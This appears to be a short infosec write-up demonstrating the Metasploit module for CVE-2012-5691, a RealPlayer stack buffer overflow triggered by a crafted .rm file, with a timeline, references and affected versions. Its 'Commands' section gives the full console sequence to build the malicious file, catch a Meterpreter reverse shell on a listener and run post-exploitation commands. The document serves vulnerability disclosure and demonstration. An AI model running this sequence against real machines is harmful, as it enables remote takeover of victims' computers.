Timeline :
Vulnerability discovered and reported to vendor by auto
Coordinated public release of the vulnerability the 2012-12-14
Metasploit PoC provided the 2012-12-25
PoC provided by :
suto
Reference(s) :
CVE-2012-5691
OSVDB-88486
BID-56956
RealNetworks Security Advisory
Affected version(s) :
Real Player version 15.0.5.109 and bellow
Tested on Windows XP Pro SP3 with :
Real Player 15.0.5.109
Description :
This module exploits a stack based buffer overflow on RealPlayer prior or equal to 15.0.6.14. The vulnerability exists in the handling of real media files, due to the insecure usage of the GetPrivateProfileString function to retrieve the URL property from an InternetShortcut section. This module generates a malicious rm file which must be opened with RealPlayer via drag and drop or double click methods.
Commands :
use exploit/windows/fileformat/real_player_url_property_bof set FILENAME msf.rm set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.26 exploit use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.26 exploit -j sysinfo getuid
RT @eromang: CVE-2012-5691 #RealPlayer #RealMedia File Handling Buffer Overflow #Metasploit Demo http://t.co/OOjurZTD #infosec